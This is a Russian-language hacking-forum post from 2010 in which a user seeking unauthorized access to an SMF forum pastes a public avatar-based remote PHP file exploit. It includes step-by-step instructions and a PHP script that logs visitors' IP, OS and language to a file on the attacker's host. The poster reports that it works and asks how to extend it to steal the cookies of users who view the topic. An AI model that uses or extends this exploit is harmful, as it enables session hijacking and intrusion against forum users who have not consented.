20.04.2010, 19:34
|
|
Познающий
Регистрация: 26.12.2007
Сообщений: 38
С нами:
9671107
Репутация:
8
|
|
Получить куки на SMF 1.1.18
Значит нужен доступ к одному форуму , версия форума 1.1.18 .
Нашел под форум exploit :
Simple Machines Forum <= 1.1.8 (avatar) Remote PHP File Execute PoC
- Step by Step:
1) go to your profile in section of avatar.
2) put the url of the malicious php file as avatar (ex: http://target/poc.php).
3) create a new topic.
- [victims] All the people that visit the topic will be infect.
malicious file example [steal info]: (poc.php)
PHP код:
<?php $ip = $_SERVER; $so= $_SERVER; $lan= $_SERVER; $url= $_SERVER; $path= $_SERVER; $archivo = 'hacks.txt'; $fp = fopen($archivo, "a"); $string = " Simple Machines Forum <= 1.1.8 (avatar) rpfe PoC $path$url VICTIM: $ip info: $so language: $lan "; $write = fputs($fp, $string); fclose($fp); ?>
Делаю все как указанно выше , на моем хосте в файл hacks.txt пишется Ип , Время , Дата и sysinfo . Возможно ли с помощью этого exploita тянуть куки зашедших в топик ??? |
|
|